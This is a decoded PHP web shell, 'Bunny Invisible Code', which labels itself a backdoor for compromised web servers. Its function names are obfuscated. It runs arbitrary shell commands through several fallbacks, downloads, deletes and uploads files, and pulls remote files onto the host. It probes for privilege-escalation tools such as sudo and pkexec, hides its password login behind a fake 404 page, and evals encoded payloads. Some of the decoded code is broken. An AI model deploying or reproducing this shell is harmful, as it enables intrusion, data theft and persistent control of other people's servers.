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PHP Decode

<?php /** * Enjoy! -BunnyInvisible404 */ session_start(); set_time_limit(0)..

Decoded Output download

 * Enjoy! -BunnyInvisible404  
@ini_set('error_log', null);  
@ini_set('log_errors', 0);  
@ini_set('max_execution_time', 0);  
@ini_set('output_buffering', 0);  
@ini_set('display_errors', 0);  
//string concat manipulation  
$hayoloh = 'h' . 'tm' . 'lspe' . 'cialc' . 'hars';  
$func_exist = 'fu' . 'nct' . 'ion' . '_' . 'ex' . 'ist' . 's';  
$f_exist = "fil" . "e_exi" . "sts";  
$f_size = "fi" . "les" . "ize";  
$r_file = "re" . "ad" . "fi" . "le";  
$rnd = 'ro' . 'un' . 'd';  
$f_time = 'fi' . 'l' . 'em' . 'ti' . 'm' . 'e';  
$b_name = "ba" . "sena" . "me";  
$glb = 'g' . 'l' . 'o' . 'b';  
$is_d = 'is' . '_' . 'd' . 'i' . 'r';  
$is_f = 'is' . '_' . 'f' . 'i' . 'l' . 'e';  
$unl = 'u' . 'n' . 'l' . 'i' . 'n' . 'k';  
$rm_d = 'r' . 'm' . 'd' . 'i' . 'r';  
$cr_ea_teF_old_er = "mk" . "d" . "ir";  
$fo = 'fo' . 'p' . 'e' . 'n';  
$fw = 'f' . 'wr' . 'it' . 'e';  
$fc = 'f' . 'cl' . 'os' . 'e';  
$fr = 'f' . 're' . 'a' . 'd';  
$f_get = 'f' . 'il' . 'e' . '_' . 'g' . 'e' . 't' . '_' . 'co' . 'nten' . 't' . 's';  
$f_put = 'f' . 'il' . 'e' . '_' . 'pu' . 't' . '_' . 'co' . 'n' . 'te' . 'nt' . 's';  
$is_rsrc = 'is' . '_' . 're' . 'so' . 'ur' . 'ce';  
$sgc = 's' . 'trea' . 'm_g' . 'et_c' . 'ont' . 'ents';  
$proc = 'pr' . 'oc' . '_' . 'o' . 'pen';  
$proc_cls = 'p' . 'ro' . 'c' . '_' . 'c' . 'lose';  
$pop = 'p' . 'ope' . 'n';  
$pop_cls = 'pc' . 'lose';  
$exc = 'e' . 'x' . 'ec';  
$sys = 's' . 'ys' . 't' . 'em';  
$pass = 'pa' . 's' . 'sth' . 'ru';  
$sh_exc = 's' . 'he' . 'll' . '_' . 'e' . 'xe' . 'c';  
$com = 'C' . 'O' . 'M';  
$wscsh = 'WS' . 'cr' . 'ipt' . '.' . 'S' . 'he' . 'll';  
$cMdexe = 'c' . 'md' . '.' . 'e' . 'x' . 'e';  
$preg = 'pr' . 'eg_' . 'mat' . 'ch';  
$regex = '2' . '>' . '&' . '1';  
$gflate = 'g' . 'zi' . 'nf' . 'l' . 'at' . 'e';  
$b64 = 'b' . 'ase' . '6' . '4' . '_' . 'de' . 'co' . 'de';  
$nelrts = 's' . 'tr' . 'l' . 'en';  
$rhc = 'c' . 'h' . 'r';  
$dro = 'o' . 'r' . 'd';  
$f_perm = 'f' . 'il' . 'ep' . 'e' . 'r' . 'ms';  
$u_n_a_me = "p" . "hp" . "_" . "un" . "ame";  
$cw = "ge" . "tc" . "wd";  
$d_name = 'd' . 'ir' . 'na' . 'm' . 'e';  
$psx_euid = 'p' . 'os' . 'ix' . '_' . 'ge' . 'te' . 'u' . 'i' . 'd';  
$psx_egid = 'p' . 'os' . 'ix' . '_' . 'ge' . 'te' . 'g' . 'i' . 'd';  
$psx_usr_uid = 'p' . 'os' . 'ix' . '_' . 'g' . 'et' . 'pw' . 'u' . 'i' . 'd';  
$psx_grp_gid = 'p' . 'os' . 'ix' . '_' . 'ge' . 'tg' . 'rg' . 'i' . 'd';  
$myuid = 'g' . 'et' . 'my' . 'ui' . 'd';  
$mygid = 'g' . 'et' . 'my' . 'gi' . 'd';  
$cur_usr = 'g' . 'et' . '_' . 'cu' . 'rr' . 'en' . 't' . '_' . 'us' . 'er';  
$own_f = 'fi' . 'le' . 'ow' . 'n' . 'er';  
$grp_f = 'fi' . 'le' . 'gr' . 'ou' . 'p';  
$g_host_name = 'g' . 'et' . 'ho' . 'st' . 'b' . 'yn' . 'am' . 'e';  
$is_w = 'is' . '_' . 'wr' . 'it' . 'ab' . 'le';  
$is_r = 'is' . '_' . 're' . 'ad' . 'ab' . 'le';  
if (isset($_GET['downloadfile'])) {  
    $get_file = $_GET['downloadfile'];  
    global $f_exist;  
    global $f_size;  
    global $r_file;  
    global $b_name;  
    if ($f_exist($get_file)) {  
        header('Content-Description: File Transfer');  
        header('Content-Type: application/octet-stream');  
        header("Cache-Control: no-cache, must-revalidate");  
        header('Content-Transfer-Encoding: binary');  
        header("Expires: 0");  
        header("Cache-Control: no-cache, must-revalidate, max-age=60");  
        header('Content-Disposition: attachment; filename="' . $b_name($get_file) . '"');  
        header('Content-Length: ' . filesize($get_file));  
        header('Pragma: public');  
    } else {  
        echo '<s' . 'cr' . 'ip' . 't' . '>a' . 'le' . 'rt' . '(' . '"' . 'Fa' . 'il' . 'ed ' . 'To' . ' D' . 'ow' . 'nl' . 'oa' . 'd ' . 'Thi' . 's F' . 'il' . 'e :( 
' . $get_file . '"); hi' . 'st' . 'ory' . '.ba' . 'ck' . '()' . '</' . 'sc' . 'r' . 'ip' . 't>';  
function deleteDir($dirName)  
    global $f_exist;  
    global $glb;  
    global $is_d;  
    global $unl;  
    global $rm_d;  
    if (!$f_exist($dirName)) {  
        return false;  
    $files = $glb($dirName . '/*');  
    foreach ($files as $file) {  
        $is_d($file) ? deleteDir($file) : $unl($file);  
    return true;  
function deleteFile($fileName)  
    global $f_exist;  
    global $unl;  
    if ($f_exist($fileName)) {  
        if ($unl($fileName)) {  
            return true;  
        } else {  
            return false;  
    } else {  
        return false;  
function BunnyCmd($komendnya)  
    global $hayoloh;  
    global $fw;  
    global $fc;  
    global $fr;  
    global $is_rsrc;  
    global $sgc;  
    global $proc;  
    global $proc_cls;  
    global $pop;  
    global $pop_cls;  
    global $exc;  
    global $sys;  
    global $pass;  
    global $sh_exc;  
    global $com;  
    global $wscsh;  
    global $cMdexe;  
    global $func_exist;  
    global $preg;  
    global $regex;  
    if (!$preg('/' . $regex . '/i', $komendnya)) {  
        $komendnya = $komendnya . ' ' . $regex;  
    if ($func_exist($proc)) {  
        $descriptors = [  
            0 => ['pipe', 'r'],  
            1 => ['pipe', 'w'],  
            2 => ['pipe', 'w'],  
        $process = $proc($komendnya, $descriptors, $pipes);  
        if ($is_rsrc($process)) {  
            $fw($pipes[0], 'input_data_here');  
            $output = $sgc($pipes[1]);  
            $errors = $sgc($pipes[2]);  
            $resultCode = $proc_cls($process);  
            return trim($hayoloh(stripslashes($output)));  
    } elseif ($func_exist($pop)) {  
        $process = $pop($komendnya, 'r');  
        $read = $fr($process, 2096);  
        return trim($hayoloh(stripslashes(print_r("$process: " . gettype($process) . " 
    } elseif ($func_exist($exc)) {  
        $exc($komendnya, $output, $returnCode);  
        if ($returnCode === 0) {  
            $res = implode($output);  
            return trim($hayoloh(stripslashes($res)));  
    } elseif ($func_exist($sys)) {  
        $out = $sys($komendnya);  
        return trim($hayoloh(stripslashes($out)));  
    } elseif ($func_exist($pass)) {  
        $out = $pass($komendnya);  
        return trim($hayoloh(stripslashes($out)));  
    } elseif ($func_exist($sh_exc)) {  
        $out = $sh_exc($komendnya);  
        return trim($hayoloh(stripslashes($out)));  
    } elseif ($func_exist($com)) {  
        $shell = new $com($wscsh);  
        $kom_mand = "$cMdexe /c " . $komendnya;  
        $output = $shell->Exec($kom_mand)->StdOut->ReadAll();  
        return trim($hayoloh(stripslashes($output)));  
    } else {  
        return 'The F' . 'un' . 'ct' . 'io' . 'n T' . 'o R' . 'u' . 'n The C' . 'om' . 'ma' . 'nd I' . 's Di' . 'sa' . 'bl' . 'e On T' . 'h' . 'is Se' . 'rv' . 'er';  
if (isset($_POST['BIC0de'])) {  
    $komendnya = $_POST['BIC0de'];  
    echo BunnyCmd($komendnya);  
function BunnyReadFile($this_file)  
    global $hayoloh;  
    global $func_exist;  
    global $f_get;  
    global $fo;  
    global $fr;  
    global $fc;  
    $cantread = 'Cant Not Read ' . $this_file;  
    $content = '';  
    if ($func_exist($fo)) {  
        $fi_le = $fo($this_file, 'r');  
        if ($fi_le) {  
            $headers = get_headers($this_file);  
            if ($headers && strpos($headers[0], '403 Forbidden') !== false) {  
                $content = BunnyCmd('cat "' . addslashes($this_file) . '"');  
            while (!feof($fi_le)) {  
                $content .= $fr($fi_le, 8192);  
            return $content;  
        } else {  
            echo $cantread;  
            return false;  
    } elseif ($func_exist($f_get)) {  
        $content = $f_get($this_file);  
        if ($content) {  
            $headers = get_headers($this_file);  
            if ($headers && strpos($headers[0], '403 Forbidden') !== false) {  
                $content = BunnyCmd('cat "' . addslashes($this_file) . '"');  
            return $content;  
        } else {  
            echo $cantread;  
            return false;  
    } else {  
        echo $cantread;  
        return false;  
/*Bunny Ganteng*/  
function LTs($bLTs)  
    $gflate = 'g' . 'zi' . 'nf' . 'la' . 'te';  
    $b64 = 'ba' . 'se' . '64_' . 'de' . 'co' . 'de';  
    $nelrts = 'st' . 'rl' . 'en';  
    $rhc = 'c' . 'h' . 'r';  
    $dro = 'o' . 'r' . 'd';  
    $bLTs = $gflate($b64($bLTs));  
    for ($i = 0; $i < $nelrts($bLTs); $i++) {  
        $bLTs[$i] = $rhc($dro($bLTs[$i]) - 1);  
    return $bLTs;  
/***#***/ @/*55555*/eval  
/*Bunny Invisible Code*/  
$s_he_ll_Name = "Bunny Invisible Code";  
$s_he_ll_Logo = "";  
$s_he_ll_Icon = "";  
function BunnyCwd()  
    global $cw;  
    global $func_exist;  
    global $d_name;  
    if ($func_exist($cw)) {  
        return @$cw();  
    } else {  
        return $d_name($_SERVER["SCRIPT_FILENAME"]);  
function BunnyUname()  
    global $func_exist;  
    global $u_n_a_me;  
    $u_n_a_me_disable = '<font class="font-ubuntu-mono font-green"> Ca' . 'nt' . ' R' . 'ea' . 'd Th' . 'e Ke' . 'rn' . 'el' . '! Th' . 'e F' . 'u' . 'nc' . 'ti' . 'o' . 'n ' . $u_n_a_me . '() is Di' . 'sa' . 'bl' . 'ed' . '! </font>';  
    $u_n_a_me_active = '<font class="font-ubuntu-mono font-green">' . $u_n_a_me('a') . '</font>';  
    if ($func_exist($u_n_a_me)) {  
        return $u_n_a_me_active;  
    } else {  
        return $u_n_a_me_disable;  
function perms($value)  
    global $f_perm;  
    $perms = $f_perm($value);  
    if (($perms & 0xC000) == 0xC000) {  
        $info = 's';  
    } elseif (($perms & 0xA000) == 0xA000) {  
        $info = 'l';  
    } elseif (($perms & 0x8000) == 0x8000) {  
        $info = '-';  
    } elseif (($perms & 0x6000) == 0x6000) {  
        $info = 'b';  
    } elseif (($perms & 0x4000) == 0x4000) {  
        $info = 'd';  
    } elseif (($perms & 0x2000) == 0x2000) {  
        $info = 'c';  
    } elseif (($perms & 0x1000) == 0x1000) {  
        $info = 'p';  
    } else {  
        $info = 'u';  
    $info .= (($perms & 0x0100) ? 'r' : '-');  
    $info .= (($perms & 0x0080) ? 'w' : '-');  
    $info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x') : (($perms & 0x0800) ? 'S' : '-'));  
    $info .= (($perms & 0x0020) ? 'r' : '-');  
    $info .= (($perms & 0x0010) ? 'w' : '-');  
    $info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x') : (($perms & 0x0400) ? 'S' : '-'));  
    $info .= (($perms & 0x0004) ? 'r' : '-');  
    $info .= (($perms & 0x0002) ? 'w' : '-');  
    $info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x') : (($perms & 0x0200) ? 'T' : '-'));  
    // return $info;  
    return $info . '&nbsp;<font class="text-white font-bold">&gt;&gt;</font>&nbsp;' . substr(sprintf('%o', $perms), -4);  
function chPerms($value)  
    global $f_perm;  
    $perms = $f_perm($value);  
    return substr(sprintf('%o', $perms), -4);  
if (!$func_exist($psx_egid)) {  
    $user = $func_exist($cur_usr) ? @$cur_usr() : "????";  
    $uid = $func_exist($myuid) ? @$myuid() : "????";  
    $gid = $func_exist($mygid) ? @$mygid() : "????";  
    $group = "?";  
} else {  
    $uid = $func_exist($psx_usr_uid) && $func_exist($psx_euid) ? @$psx_usr_uid($psx_euid()) : array("name" => "????", "uid" => "????");  
    $gid = $func_exist($psx_grp_gid) && $func_exist($psx_egid) ? @$psx_grp_gid($psx_egid()) : array("name" => "????", "gid" => "????");  
    $user = $uid['name'];  
    $uid = $uid['uid'];  
    $group = $gid['name'];  
    $gid = $gid['gid'];  
$serverName = $_SERVER['SERVER_SOFTWARE'];  
$phpVersion = phpversion();  
function serverIp()  
    global $func_exist;  
    global $g_host_name;  
    $serverAddr = @$_SERVER["SERVER_ADDR"];  
    if (!$serverAddr) {  
        if ($func_exist($g_host_name)) {  
            return @$g_host_name($_SERVER['SERVER_NAME']);  
        } else {  
            return '????';  
    } else {  
        return $serverAddr;  
function userIp()  
    return @$_SERVER["REMOTE_ADDR"];  
if (@ini_get('safe_mode'))  
    $safeMode = '<font class="font-ubuntu-mono font-green">ON</font>';  
    $safeMode = '<font class="font-ubuntu-mono font-yellow">OFF</font>';  
if (@ini_get('disable_functions'))  
    $cekFunc = '<font class="font-ubuntu-mono font-yellow">' . @ini_get('disable_functions') . '</font>';  
    $cekFunc = '<font class="font-ubuntu-mono font-green">All F' . 'un' . 'ct' . 'io' . 'n' . 's Ac' . 'ces' . 'sib' . 'le' . '</font>';  
$on = '<font class="ubuntu-mono" style="color: rgb(22 163 74); font-weight: 700;">ON</font>';  
$off = '<font class="ubuntu-mono" style="color: rgb(250 204 21); font-weight: 700;">OFF</font>';  
function cekCurl()  
    global $func_exist;  
    global $f_exist;  
    global $on;  
    global $off;  
    if ($func_exist('cu' . 'rl' . '_' . 'in' . 'it') || $f_exist('/' . 'u' . 's' . 'r' . '/' . 'b' . 'i' . 'n' . '/' . 'cu' . 'r' . 'l')) {  
        echo "cURL:&nbsp;&nbsp;$on";  
    } else {  
        echo "cURL:&nbsp;&nbsp;$off";  
function cekWget()  
    global $f_exist;  
    global $on;  
    global $off;  
    if ($f_exist('/' . 'u' . 's' . 'r' . '/' . 'b' . 'i' . 'n' . '/' . 'wg' . 'e' . 't')) {  
        echo "WGET:&nbsp;&nbsp;$on";  
    } else {  
        echo "WGET:&nbsp;&nbsp;$off";  
function cekPerl()  
    global $f_exist;  
    global $on;  
    global $off;  
    if ($f_exist('/' . 'u' . 's' . 'r' . '/' . 'b' . 'i' . 'n' . '/' . 'pe' . 'r' . 'l')) {  
        echo "PERL:&nbsp;&nbsp;$on";  
    } else {  
        echo "PERL:&nbsp;&nbsp;$off";  
function cekRuby()  
    global $f_exist;  
    global $on;  
    global $off;  
    if ($f_exist('/' . 'u' . 's' . 'r' . '/' . 'b' . 'i' . 'n' . '/' . 'ru' . 'b' . 'y')) {  
        echo "RUBY:&nbsp;&nbsp;$on";  
    } else {  
        echo "RUBY:&nbsp;&nbsp;$off";  
function cekPython3()  
    global $f_exist;  
    global $on;  
    global $off;  
    if ($f_exist('/' . 'u' . 's' . 'r' . '/' . 'b' . 'i' . 'n' . '/' . 'py' . 't' . 'ho' . 'n3')) {  
        echo "PYTHON3:&nbsp;&nbsp;$on";  
    } else {  
        echo "PYTHON3:&nbsp;&nbsp;$off";  
function cekPython2()  
    global $f_exist;  
    global $on;  
    global $off;  
    if ($f_exist('/' . 'u' . 's' . 'r' . '/' . 'b' . 'i' . 'n' . '/' . 'py' . 't' . 'h' . 'o' . 'n2')) {  
        echo "PYTHON2:&nbsp;&nbsp;$on";  
    } else {  
        echo "PYTHON2:&nbsp;&nbsp;$off";  
function cekGcc()  
    global $f_exist;  
    global $on;  
    global $off;  
    if ($f_exist('/' . 'u' . 's' . 'r' . '/' . 'b' . 'i' . 'n' . '/' . 'g' . 'c' . 'c')) {  
        echo "GCC:&nbsp;&nbsp;$on";  
    } else {  
        echo "GCC:&nbsp;&nbsp;$off";  
function cekSudo()  
    global $f_exist;  
    global $on;  
    global $off;  
    if ($f_exist('/' . 'u' . 's' . 'r' . '/' . 'b' . 'i' . 'n' . '/' . 'su' . 'd' . 'o')) {  
        echo "SUDO:&nbsp;&nbsp;$on";  
    } else {  
        echo "SUDO:&nbsp;&nbsp;$off";  
function cekPkexec()  
    global $f_exist;  
    global $on;  
    global $off;  
    if ($f_exist('/' . 'u' . 's' . 'r' . '/' . 'b' . 'i' . 'n' . '/' . 'pk' . 'e' . 'xe' . 'c')) {  
        echo "PKEXEC:&nbsp;&nbsp;$on";  
    } else {  
        echo "PKEXEC:&nbsp;&nbsp;$off";  
/*Domain - Url*/  
$this_domain = $_SERVER['HTTP_HOST'];  
$this_url = (empty($_SERVER['HTTPS']) ? 'http' : 'https') . "://$_SERVER[HTTP_HOST]$_SERVER[REQUEST_URI]";  
/*Icons - Fontawesome*/  
$fontawesome_pro_version = 'v6.5.1'; //change if updated to new version  
$fontawesome_pro = '' . $fontawesome_pro_version . '/css/pro.min.css';  
/*Framework - Uikit*/  
$uikit_css = "";  
$uikit_rtl = "";  
$uikit_js = "";  
$uikit_icon = "";  
/*Jquery - Ajax*/  
$jquery_version = '3.7.1';  
$jquery = '' . $jquery_version . '/dist/jquery.min.js';  
$ajax_version = '3.5.1';  
$ajax = '' . $ajax_version . '/jquery.min.js';  
/*Login Page*/  
$passwd = '5c3c0d4ceddf2d80aad8df2c5e28e976c19e286a'; // kontolpecah  
$my_self = (empty($_SERVER['HTTPS']) ? 'http' : 'https') . "://$_SERVER[HTTP_HOST]$_SERVER[REQUEST_URI]";  
if (isset($_POST['gasken'])) {  
    if (SHA1($_POST['passnya']) == $passwd) {  
        function setconf($defconf)  
            $gflate = 'g' . 'zi' . 'nf' . 'la' . 'te';  
            $b64 = 'ba' . 'se' . '64_' . 'de' . 'co' . 'de';  
            $nelrts = 'st' . 'rl' . 'en';  
            $rhc = 'c' . 'h' . 'r';  
            $dro = 'o' . 'r' . 'd';  
            $defconf = $gflate($b64($defconf));  
            for ($i = 0; $i < $nelrts($defconf); $i++) {  
                $defconf[$i] = $rhc($dro($defconf[$i]) - 1);  
            return $defconf;  
        /***#***/ @/*55555*/eval  
        echo "<s" . "cr" . "ip" . "t>" . "al" . "er" . "t(" . "'Lo" . "gi" . "n " . "Su" . "cc" . "es" . "s!" . " Yo" . "u " . "Pr" . "o'" . ");" . "</" . "sc" . "ri" . "pt" . ">";  
        $_SESSION["modyarambyar"] = "modyarambyar";  
        setcookie('kacamatavz', $my_self, time() + 3600 * 24);  
    } else {  
        echo "<s" . "cr" . "ip" . "t>" . "al" . "er" . "t(" . "'Lo" . "gi" . "n F" . "ai" . "le" . "d!" . " Go " . "A" . "w" . "a" . "y " . "Nu" . "b')" . ";<" . "/s" . "cr" . "ip" . "t>";  
if (isset($_GET['logout'])) {  
    $_SESSION = [];  
    setcookie('kacamatavz', '', time() - 3600);  
    echo "<s" . "c" . "ri" . "pt" . ">" . "window.location.assign('" . $_SERVER['PHP_SELF'] . "')" . "</" . "sc" . "ri" . "pt" . ">";  
if (empty($_SESSION['modyarambyar'])) {  
    if (empty($_COOKIE['kacamatavz'])) {  
        <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">  
            <title><?= '4' . '0' . '4 ' . 'N' . 'o' . 't' . ' ' . 'F' . 'o' . 'u' . 'n' . 'd' ?></title>  
            <h1>Not Found</h1>  
            <p><?= 'T' . 'h' . 'e r' . 'eq' . 'ue' . 'st' . 'ed' . ' U' . 'R' . 'L ' . 'wa' . 's n' . 'o' . 't f' . 'ou' . 'nd' . ' o' . 'n t' . 'hi' . 's s' . 'e' . 'rv' . 'e' . 'r.' ?>  
            <p><?= 'Ad' . 'di' . 'ti' . 'o' . 'na' . 'l' . 'ly' . ',' . ' ' . 'a ' . '4' . '0' . '4 ' . 'N' . 'ot' . ' Fo' . 'un' . 'd e' . 'rr' . 'or ' . 'w' . 'as' . ' e' . 'nc' . 'ou' . 'nt' . 'er' . 'ed' . ' wh' . 'il' . 'e t' . 'ry' . 'in' . 'g ' . 't' . 'o us' . 'e a' . 'n E' . 'rr' . 'or' . 'D' . 'oc' . 'um' . 'en' . 't t' . 'o h' . 'an' . 'dl' . 'e th' . 'e r' . 'eq' . 'ue' . 's' . 't.' ?>  
            <div id="notfound" style="display: none;">  
                <form action="" method="POST">  
                    <input type="password" name="passnya" style="background: #fff; border: none;">  
                    <button type="submit" name="gasken"  
                        style="background: #fff; color: #fff; border: none; outline: none; cursor: pointer;">&gt;&gt;</button>  
            <script type="text/javascript"  
if (isset($_GET['path'])) {  
    $path = $_GET['path'];  
} else {  
    $path = BunnyCwd();  
$path = str_replace("\", "/", $path);  
<!DOCTYPE html  
    PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "">  
<html xmlns="">  
    <title>.:<?= $s_he_ll_Name ?>:. <?= $this_domain ?></title>  
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    <meta name="description" content="<?= $s_he_ll_Name ?> Backdoor" />  
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    <meta property="og:title" content=".:<?= $s_he_ll_Name ?>:. <?= $this_domain ?>" />  
    <meta property="og:description" content="<?= $s_he_ll_Name ?> Backdoor" />  
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        if (isDesktop()) {  
            document.getElementById('viewport').setAttribute('content', 'width=1024');  
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    <header class="uk-width-1-1" style="background: var(--gray-900);">  
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                <img style="width: 5vh; border-radius: 5px;" src="<?= $s_he_ll_Logo ?>" alt="<?= $s_he_ll_Name ?>">  
                <span class="uk-margin-small-left font-trade-winds uk-text-large"><?= $s_he_ll_Name ?></span>  
            <div class="bunny-sysinfo uk-flex uk-flex-left uk-flex-column uk-flex-wrap">  
                <span class="font-bold"><?= 'Sy' . 's' . 'te' . 'm' ?>: <?= BunnyUname(); ?></span>  
                <span class="font-bold"><?= 'ID' . '(' . 'Us' . 'er' . '/' . 'G' . 'ro' . 'u' . 'p)' ?>: <font  
                        class="font-green font-ubuntu-mono">uid=<?= $uid ?>(<?= $user ?>)&nbsp;gid=<?= $gid ?>(<?= $group ?>)  
                <span class="font-bold"><?= 'Se' . 'r' . 'v' . 'er ' . 'I' . 'P' ?>: <font class="font-green font-ubuntu-mono">  
                        <?= serverIp() ?></font></span>  
                <span class="font-bold"><?= 'Yo' . 'u' . 'r I' . 'P' ?>: <font class="font-green font-ubuntu-mono"><?= userIp() ?>  
                <span class="font-bold"><?= 'S' . 'a' . 'f' . 'e ' . 'Mo' . 'd' . 'e' ?>: <?= $safeMode ?></span>  
                <span class="font-bold"><?= 'P' . 'HP' . ' ' . 'Ve' . 'r' . 's' . 'i' . 'on' ?>: <font  
                        class="font-green font-ubuntu-mono"><?= $phpVersion ?></font></span>  
                <span class="font-bold"><?= 'S' . 'er' . 'v' . 'e' . 'r' ?>: <font class="font-green font-ubuntu-mono">  
                        <?= $serverName ?></font></span>  
                    class="font-bold uk-text-wrap uk-flex uk-flex-row uk-flex-wrap"><?= 'Di' . 'sa' . 'b' . 'l' . 'e ' . 'F' . 'un' . 'ct' . 'i' . 'on' ?>:&nbsp;<?= $cekFunc ?></span>  
                    class="font-bold"><?= cekCurl() ?>&nbsp;|&nbsp;<?= cekWget() ?>&nbsp;|&nbsp;<?= cekPython2() ?>&nbsp;|&nbsp;<?= cekPython3() ?>&nbsp;|&nbsp;<?= cekPerl() ?>&nbsp;|&nbsp;<?= cekRuby() ?>&nbsp;|&nbsp;<?= cekgcc() ?>&nbsp;|&nbsp;<?= cekPkexec() ?>&nbsp;|&nbsp;<?= cekSudo() ?></span>  
                $pa_t_hs = explode("/", $path);  
                echo '<span class="font-bold pwd"><i class="fa-duotone fa-folder-tree"></i>&nbsp;&nbsp;PWD: ';  
                echo '<a class="font-red" href="?path=/"><i class="fa-sharp fa-solid fa-slash-forward"></i></a>';  
                foreach ($pa_t_hs as $id => $pat) {  
                    echo "<a class='path' href='?path=";  
                    for ($i = 0; $i <= $id; $i++) {  
                        echo $pa_t_hs[$i];  
                        if ($i != $id) {  
                            echo '/';  
                    echo "'>$pat</a><span class='font-red'>/</span>";  
                echo "&nbsp;&nbsp;<span class='font-red'>[ <a href='" . $_SERVER['PHP_SELF'] . "' class='home_sh_e_ll'><font class='home_sh_e_ll'>Ho" . "me" . " " . "Sh" . "el" . "l</font></a> ]</span>";  
                echo '</span>';  
    <div class="bunny-tools uk-width-1-1 uk-flex uk-flex-center uk-flex-middle uk-flex-column uk-flex-wrap"  
        style="background: var(--gray-900);">  
        <div class="tools-upload">  
            <form action="" method="POST" enctype="multipart/form-data"  
                class="form-tools uk-form-horizontal uk-margin uk-padding-small font-protest-riot">  
                <input type="file" name="file[]" onchange="this.form.submit()" multiple>  
            if ($_SERVER["REQUEST_METHOD"] === "POST") {  
                if (isset($_FILES["file"])) {  
                    $countFiles = count($_FILES["file"]["name"]);  
                    for ($i = 0; $i < $countFiles; $i++) {  
                        $fi_le_Na_me = $_FILES["file"]["name"][$i];  
                        $location = "" . $fi_le_Na_me;  
                        $u_pl_oa_dF_un_ct_ion = "m" . "ove" . "_up" . "loa" . "ded_fi" . "le";  
                        if ($u_pl_oa_dF_un_ct_ion($_FILES["file"]["tmp_name"][$i], $location)) {  
                            echo '  
                            <div class="uk-alert-success uk-flex uk-flex-center uk-flex-middle uk-flex-column uk-flex-wrap" uk-alert style="background: transparent;">  
                                <a href class="uk-alert-close" uk-close></a>  
                                <p><font class="font-white">Fi' . 'le => <a href="' . $fi_le_Na_me . '">' . $fi_le_Na_me . '</a></font> Su' . 'cc' . 'es' . 's Up' . 'lo' . 'a' . 'de' . 'd <i class="fa-sharp fa-solid fa-shield-check"></i></p>  
                        } else {  
                            echo '  
                            <div class="uk-alert-danger uk-flex uk-flex-center uk-flex-middle uk-flex-column uk-flex-wrap" uk-alert style="background: transparent;">  
                                <a href class="uk-alert-close" uk-close></a>  
                                <p><font class="font-white">Fi' . 'le => ' . $fi_le_Na_me . '</font> Fa' . 'il' . 'ed ' . 'To' . ' U' . 'pl' . 'oa' . 'd <i class="fa-solid fa-octagon-xmark"></i></p>  
                } else {  
                    echo '  
                    <div class="uk-alert-warning uk-flex uk-flex-center uk-flex-middle uk-flex-column uk-flex-wrap" uk-alert style="background: transparent;">  
                        <a href class="uk-alert-close" uk-close></a>  
                        <p>No Fi' . 'l' . 'es U' . 'pl' . 'oa' . 'de' . 'd.<i class="fa-regular fa-location-exclamation"></i></p>  
        if (isset($_POST['btn-remoteup'])) {  
            $this_file = $_POST['fileurl'];  
            $this_file_name = $_POST['savedname'];  
            $f_content = $f_get($this_file);  
            if (!empty($this_file) && !empty($this_file_name)) {  
                if ($f_content !== false) {  
                    $writeF = $f_put($this_file_name, $f_content);  
                    if ($writeF !== false) {  
                        echo '  
                            <div class="uk-alert-success uk-flex uk-flex-center uk-flex-middle uk-flex-column uk-flex-wrap" uk-alert style="background: transparent;">  
                                <a href class="uk-alert-close" uk-close></a>  
                                <p><font class="font-white">Fi' . 'le => <a href="' . $this_file_name . '">' . $this_file_name . '</a></font> S' . 'uc' . 'ce' . 's' . 's U' . 'pl' . 'oa' . 'de' . 'd <i class="fa-sharp fa-solid fa-shield-check"></i></p>  
                    } else {  
                        echo '  
                            <div class="uk-alert-danger uk-flex uk-flex-center uk-flex-middle uk-flex-column uk-flex-wrap" uk-alert style="background: transparent;">  
                                <a href class="uk-alert-close" uk-close></a>  
                                <p><font class="font-white">Fi' . 'le => ' . $this_file_name . '</font> Fa' . 'i' . 'le' . 'd ' . 'To' . ' Up' . 'lo' . 'ad<i class="fa-solid fa-octagon-xmark"></i></p>  
                } else {  
                    echo '  
                        <div class="uk-alert-danger uk-flex uk-flex-center uk-flex-middle uk-flex-column uk-flex-wrap" uk-alert style="background: transparent;">  
                            <a href class="uk-alert-close" uk-close></a>  
                            <p><font class="font-white">Fi' . 'le => ' . $this_file_name . '</font> Fa' . 'il' . 'ed T' . 'o U' . 'pl' . 'oa' . 'd<i class="fa-solid fa-octagon-xmark"></i></p>  
            } else {  
                echo '  
                    <div class="uk-alert-warning uk-flex uk-flex-center uk-flex-middle uk-flex-column uk-flex-wrap" uk-alert style="background: transparent;">  
                        <a href class="uk-alert-close" uk-close></a>  
                        <p>No F' . 'il' . 'es U' . 'pl' . 'oa' . 'de' . 'd, Your Input Is Empty<i class="fa-regular fa-location-exclamation"></i></p>  
        <div class="tools-remoteup uk-width-1-1 uk-flex uk-flex-center uk-flex-middle uk-flex-column uk-flex-wrap">  
            <form action="" method="POST" class="uk-width-1-2">  
                <fieldset class="uk-fieldset">  
                    <legend class="uk-legend font-bold font-protest-riot"><?= 'Re' . 'mo' . 'te' . ' U' . 'pl' . 'oa' . 'd' ?>  
                    <div class="uk-margin-small">  
                        <input class="uk-input font-poppins" name="fileurl" type="text"  
                            placeholder="<?= 'ht' . 'tp' . 's' . ':/' . '/b' . 'u' . 'nn' . 'ym' . 'an.' . 'ed' . 'u.' . 'go' . 'v.' . 'ac' . '.i' . 'd.' . 'go' . '.i' . 'd/' . 'b' . 'u' . 'nny' . '.tx' . 't' ?>"  
                        <div class="uk-margin-small"></div>  
                        <input class="uk-input font-poppins" name="savedname" type="text" placeholder="saved.txt"  
                    <div class="uk-float-right">  
                        <button type="submit" name="btn-remoteup"  
                            class="uk-button uk-button-primary uk-text-bold uk-border-rounded">Get</button>  
        <div class="tools-etc uk-flex uk-flex-center uk-flex-middle uk-flex-row uk-flex-wrap">  
            <a href="?path=<?= $path ?>&tools=newfiles"><button  
                    class="btn-new-file uk-button uk-button-default uk-margin-large-bottom font-white font-protest-riot"><i  
                        class="fa-solid fa-file-plus"></i>&nbsp;<?= 'N' . 'ew' . ' F' . 'il' . 'e' . 's' ?></button></a>  
            <a href="?path=<?= $path ?>&tools=cmd"><button  
                    class="btn-cmd uk-button uk-button-default uk-margin-small-left uk-margin-small-right uk-margin-large-bottom font-white font-ubuntu-mono"><i  
